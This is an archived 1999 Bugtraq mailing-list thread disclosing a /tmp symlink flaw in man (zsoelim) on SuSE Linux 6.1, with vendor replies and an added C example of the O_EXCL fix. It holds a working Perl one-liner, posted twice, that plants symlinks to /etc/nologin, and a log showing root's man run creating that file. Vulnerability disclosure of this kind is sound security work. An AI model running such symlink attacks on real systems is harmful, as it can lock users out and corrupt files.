Date: Wed, 2 Jun 1999 11:01:32 +0200
From: Thomas Fischbacher <Thomas.Fischbacher@PHYSIK.UNI-MUENCHEN.DE>
To: BUGTRAQ@netspace.org
Subject: /tmp symlink problems in SuSE Linux 6.1

I notified SuSE GmbH several weeks ago about this problem, but didn't get
any response, therefore this post to Bugtraq.


With SuSE Linux 6.1 there are still a few programs around which blindly
create files in /tmp regardless of whether a symlink or something
similarly evil already exists in that place. Among these programs are
'man' and 'dvips'.


Though it seems to be impossible by now to overwrite /etc/passwd with a
plain simple /tmp/zman01234aaa symlink (didn't check if the source is
race-condition free, though), one can still create arbitrary
files which do funny things. Example:

perl -e 'for($i=1000;$i<5000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'


--
regards,               tf@cip.physik.uni-muenchen.de              (o_
 Thomas Fischbacher -  http://www.cip.physik.uni-muenchen.de/~tf  //\
(lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y)           V_/_
(if (= x 0) y (g g (- x 1) (* x y)))) n 1))

-------------------------------------------------------------------------------

Date: Fri, 4 Jun 1999 09:52:36 +0200
From: Thomas Biege <thomas@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

Hi,
we at SuSE could not reproduce this problem for either
man or dvips.

Please send us a full list of "maybe" buggy tools, so we
could evaluate them.

Bye,
     Thomas

PS: I never saw your email on our mailing lists.

--
  Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
  E@mail: thomas@suse.de      Function: Security Support & Auditing
  "lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"
  Key fingerprint = E3 42 DA D1 3B 9C 23 D0  93 1F B8 2E 6B 9A 45 82

-------------------------------------------------------------------------------

Date: Fri, 4 Jun 1999 16:36:46 +0200
From: Thomas Fischbacher <Thomas.Fischbacher@PHYSIK.UNI-MUENCHEN.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

> Hi,
> we at SuSE could not reproduce this problem for either
> man or dvips.

Ok, here is a log of what I just did five minutes ago:
(emacs -- M-x shell, btw.)


brauneck:~ # whoami
root
brauneck:~ # cd /tmp
brauneck:/tmp # cat /etc/SuSE-release
SuSE Linux 6.1 (i386)
VERSION = 6.1
brauneck:/tmp # rpm -q man
man-2.3.10-62
brauneck:/tmp # md5sum /usr/bin/man
b383967ce695352002f077680e375c62  /usr/bin/man
brauneck:/tmp # su tf
tf@brauneck:/tmp > export LS_OPTIONS=''
tf@brauneck:/tmp > export LS_COLORS=''
tf@brauneck:/tmp > ls zman*
ls: zman*: No such file or directory
tf@brauneck:/tmp > /bin/bash -c "echo $$"
6056
tf@brauneck:/tmp > # this gives me a current pid range
tf@brauneck:/tmp > perl -e 'for($i=6000;$i<7000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'
tf@brauneck:/tmp > ls -l /tmp/zman06123aaa
lrwxrwxrwx   1 tf       stud           12 Jun  4 16:28 /tmp/zman06123aaa -> /etc/nologin
tf@brauneck:/tmp > ls -l /etc/nologin
ls: /etc/nologin: No such file or directory
tf@brauneck:/tmp > exit
brauneck:/tmp # man mmap
Reformatting mmap(2), please wait...
WARNING: terminal is not fully functional




MMAP(2)             Linux Programmer's Manual             MMAP(2)


NAME
       mmap, munmap - map or unmap files or devices into memory

SYNOPSIS
       #include <unistd.h>
       #include <sys/mman.h>

       #ifdef _POSIX_MAPPED_FILES

       void  *  mmap(void  *start,  size_t length, int prot , int
       flags, int fd, off_t offset);

       int munmap(void *start, size_t length);

       #endif

DESCRIPTION


brauneck:/tmp # ls -la /etc/nologin
-rw-r--r--   1 root     root         4319 Jun  4 16:30 /etc/nologin
brauneck:/tmp # ls /tmp/zman0* | wc -l
    999
brauneck:/tmp # # Note that one link was removed!
brauneck:/tmp #

You see -- the problem definitely is not fiction! Come over to Munich and
see yourself if you want.


> Please send us a full list of "maybe" buggy tools, so we
> could evaluate them.

?

> PS: I never saw your email at your mailinglists.

?

--
regards,               tf@cip.physik.uni-muenchen.de              (o_
 Thomas Fischbacher -  http://www.cip.physik.uni-muenchen.de/~tf  //\
(lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y)           V_/_
(if (= x 0) y (g g (- x 1) (* x y)))) n 1))

-------------------------------------------------------------------------------

Date: Sat, 5 Jun 1999 07:13:28 +0200
From: Thomas Biege <thomas@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

On Fri, 4 Jun 1999, Thomas Fischbacher wrote:

> > we at SuSE could not reproduce this problem for either
> > man or dvips.
>
> Ok, here is a log of what I just did five minutes ago:
> (emacs -- M-x shell, btw.)

[...]

> You see -- the problem definitely is not fiction! Come over to Munich and
> see yourself if you want.

I don't think it's fiction...
... the fact is that just old releases of SuSE 6.1 seem to be
vulnerable; the newer releases aren't - man uses open(O_EXCL) and
drops its privileges.

A customer told me that the behavior you described just happens
when he opens a big man page for the first time... we will check
this as soon as possible.

> > Please send us a full list of "maybe" buggy tools, so we
> > could evaluate them.
> ?

In your first post to Bugtraq you mentioned that more tools have
/tmp symlink problems... feel free to tell us about them.
(BTW, I strace'd dvips on my SuSE 6.0 and it never touched /tmp.)

Bye,
     Thomas
--
  Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
  E@mail: thomas@suse.de      Function: Security Support & Auditing
  "lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"
  Key fingerprint = E3 42 DA D1 3B 9C 23 D0  93 1F B8 2E 6B 9A 45 82

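The fix Thomas mentions above (open the temp file with O_EXCL so that a pre-planted link makes the open fail instead of being followed), as an added C example that is not part of this thread or of the man package. It builds its own private directory under /tmp with a constructed link name, so it never touches /etc/nologin or any real zman file:

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern (what the old zsoelim did): O_CREAT without O_EXCL
 * follows a pre-planted symlink and creates/truncates whatever it points at. */
int unsafe_create(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

/* Hardened: O_EXCL makes open() fail with EEXIST if any entry, even a
 * dangling symlink, already occupies the name, and nothing is followed.
 * (mkstemp() gives the same guarantee plus an unpredictable name.) */
int safe_create(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return -errno;
    close(fd);
    return 0;
}

/* Demo: in a constructed sandbox directory, plant a link whose target does
 * not exist yet and try both variants on it. Returns 1 if the unsafe variant
 * created the link target and the safe variant refused with EEXIST. */
int demo_symlink_attack(void)
{
    char dir[] = "/tmp/zman-demo-XXXXXX";          /* constructed sandbox */
    if (mkdtemp(dir) == NULL) return -1;
    char link[256], target[256];
    snprintf(link, sizeof link, "%s/zman0123aaa", dir);
    snprintf(target, sizeof target, "%s/victim", dir); /* stands in for /etc/nologin */
    if (symlink(target, link) != 0) return -1;

    int unsafe_rc = unsafe_create(link);
    int followed = (access(target, F_OK) == 0);     /* did "victim" get created? */
    unlink(target);
    int safe_rc = safe_create(link);                /* expected: -EEXIST */

    unlink(link); rmdir(dir);
    return unsafe_rc == 0 && followed && safe_rc == -EEXIST;
}
```

O_EXCL alone only protects the file creation step; as the thread notes, man additionally drops root privileges before touching /tmp, which limits the damage if any other step is still racy.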
-------------------------------------------------------------------------------

Date: Sat, 5 Jun 1999 22:02:19 +0200
From: Marc Heuse <marc@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

Hi,

we confirmed the link vulnerability in the man package.
The culprit is zsoelim which creates the file without looking left and
right. :-(

All linux distributions using man 2.3.10 should be affected.

A fixed package from us will be available soon.

Greets,
        Marc
--
   Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
   E@mail: marc@suse.de  Function: Security Support & Auditing
   "lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"
Key fingerprint = B5 07 B6 4E 9C EF 27 EE  16 D9 70 D4 87 B5 63 6C